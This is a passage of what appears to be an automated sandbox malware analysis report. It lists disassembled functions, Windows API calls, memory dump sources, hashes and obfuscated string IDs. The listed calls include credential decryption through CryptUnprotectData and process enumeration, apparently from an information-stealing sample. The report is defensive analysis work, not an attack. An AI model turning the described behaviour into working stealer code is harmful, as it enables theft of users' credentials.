                                • LocalFree.KERNEL32(?), ref: 00FF77B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 9d77cc30f48ef70d83d164d5e731f43536ad66d5b771fd8f1828ea7242d0b3ec
                                • Instruction ID: bb95921cdd2c9d7b69a6a966685484f3745b2c4004e29991ee0c32ece4991362
                                • Opcode Fuzzy Hash: 9d77cc30f48ef70d83d164d5e731f43536ad66d5b771fd8f1828ea7242d0b3ec
                                • Instruction Fuzzy Hash: DE011275B403187BEB20DE94DC4AFAE7778EB44B15F104145FB09EA2C4D6B499408794
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9gO$\an$elK*$y[w
                                • API String ID: 0-4176420793
                                • Opcode ID: 22424ad36f3c1c8ab3d183e96d3e8913b66c5fb96af3cf148f18db7786e58e0b
                                • Instruction ID: fb81d6d1a6da68796d2a62ca5b238748799d1fd5e2d5ed9ff87f9bc510902df6
                                • Opcode Fuzzy Hash: 22424ad36f3c1c8ab3d183e96d3e8913b66c5fb96af3cf148f18db7786e58e0b
                                • Instruction Fuzzy Hash: B09219F3A08204AFD7046E2DEC8567AFBE5EF94320F1A493DE6C4C7344EA7598058697
                                APIs
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01013A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 01013AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 01013ABF
                                  • Part of subcall function 01017310: lstrlen.KERNEL32(------,00FF5BEB), ref: 0101731B
                                  • Part of subcall function 01017310: lstrcpy.KERNEL32(00000000), ref: 0101733F
                                  • Part of subcall function 01017310: lstrcat.KERNEL32(?,------), ref: 01017349
                                  • Part of subcall function 01017280: lstrcpy.KERNEL32(00000000), ref: 010172AE
                                • CloseHandle.KERNEL32(00000000), ref: 01013BF7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 639628e822b540999c1be95faf19513823f56f62edd1ba80eac3c29c4599ec32
                                • Instruction ID: b0ac9d239cc815cb120764d2fb7289a411856b90ae61b1020ad97ef26ed3d5ff
                                • Opcode Fuzzy Hash: 639628e822b540999c1be95faf19513823f56f62edd1ba80eac3c29c4599ec32
                                • Instruction Fuzzy Hash: DF81F630900214DFDB65CF19D988B95BBE1FB44329F29C1EDD5489F2AAD77A9882CF40
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00FFEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FFEA7E
                                • lstrcat.KERNEL32(0101CFEC,0101CFEC), ref: 00FFEB27
                                • lstrcat.KERNEL32(0101CFEC,0101CFEC), ref: 00FFEB49
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 211a5cc0852f4d075e208d21def0881edd2b7b5141c8118a4d50c5ec41c9fe4b
                                • Instruction ID: 25474ae3bf1c9e42c4bfbfeae5025d004992eeff684ba7993139a1f85947e967
                                • Opcode Fuzzy Hash: 211a5cc0852f4d075e208d21def0881edd2b7b5141c8118a4d50c5ec41c9fe4b
                                • Instruction Fuzzy Hash: BF31D575E40119ABEB209F58EC49FEEB77CDF84715F0041A9FA09E7244D7B49A04CBA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 010140CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 010140DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 010140E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 01014113
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 1d20a8f8e08bf1e809e1df7f0785d42497a550ba56e093b3ee1f939961d0aed8
                                • Instruction ID: c5bb5cd228b908e724e56ce7109dbadb2504956f02f943059a530822d0e2c8ee
                                • Opcode Fuzzy Hash: 1d20a8f8e08bf1e809e1df7f0785d42497a550ba56e093b3ee1f939961d0aed8
                                • Instruction Fuzzy Hash: 33011E74600209BBEB20DFA5EC89B6A7BEDEF45311F108199FD49C7244DB75D980CB54
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FF9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FF9B61
                                • LocalFree.KERNEL32 ref: 00FF9B70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 90e35085d09e86929496687214824d8b390631e76b8ad93aa6dcb5c47c74c453
                                • Instruction ID: c2592d02799a4c05126011294909bed4ba482435ab91368e2b1d2e543d6133d2
                                • Opcode Fuzzy Hash: 90e35085d09e86929496687214824d8b390631e76b8ad93aa6dcb5c47c74c453
                                • Instruction Fuzzy Hash: 4FF01D707443227BEB301F65BC49F667BA8EF44B60F200114FB45EA2D4D7B49880CBA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #w$WOg$xAX1
                                • API String ID: 0-2226314661
                                • Opcode ID: ceccf9539d3ce6bba646fd5476392a651041eadf61dbefddd9b3f08ddb7cf37f
                                • Instruction ID: 196f0a801965873d54243557ff79ca2b7095405927f8f3af2f61b906576647fa
                                • Opcode Fuzzy Hash: ceccf9539d3ce6bba646fd5476392a651041eadf61dbefddd9b3f08ddb7cf37f
                                • Instruction Fuzzy Hash: 0372F5F360C204AFE304AF2DEC8566ABBE9EF94720F16492DE6C4C3744EA3558458797
                                APIs
                                • CoCreateInstance.COMBASE(0101B110,00000000,00000001,0101B100,?), ref: 0100CB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0100CB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 0100CBC9
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: b518738b238493f3f2da6afcb42f7155546cf338e1c862ab2180e7da62af223c
                                • Instruction ID: 253767941181a33a8c897e7e6133e34dcb04cd56e674ab88700734b465ada863
                                • Opcode Fuzzy Hash: b518738b238493f3f2da6afcb42f7155546cf338e1c862ab2180e7da62af223c
                                • Instruction Fuzzy Hash: 3E315471A40614BFE710DB98CC85FA977B99B88B10F1042C4FB54EB2D0D7B1AE44CB90
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9BB3
                                • LocalFree.KERNEL32(?), ref: 00FF9BD7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 8dac509ea924746f8b15f4fe70dd5d3c0c5c545b0a74550e7e9de0398535607a
                                • Instruction ID: 4d91b538d3709c32258d97fa48e9c6f423ef18f118e72cd7c13b2bc0fd2ba5b6
                                • Opcode Fuzzy Hash: 8dac509ea924746f8b15f4fe70dd5d3c0c5c545b0a74550e7e9de0398535607a
                                • Instruction Fuzzy Hash: EA011275E413197BDB209FA4DC49FAEB778EB84700F104555EB04AB284D7B49E00C7D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: f`uw$FO:
                                • API String ID: 0-2050306468
                                • Opcode ID: 192c53e3c504d02f5629c17100383c8bf2dbb011fe7a816f7a24a646f50d0711
                                • Instruction ID: e6c6aed45a96efb6932cefc696839aedb06098e627fe540ee1bd287a1200a94d
                                • Opcode Fuzzy Hash: 192c53e3c504d02f5629c17100383c8bf2dbb011fe7a816f7a24a646f50d0711
                                • Instruction Fuzzy Hash: 375147F3B082145BF304592EEC4577BB7DADBD4320F2A863DEA84D7384E9399D024296
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
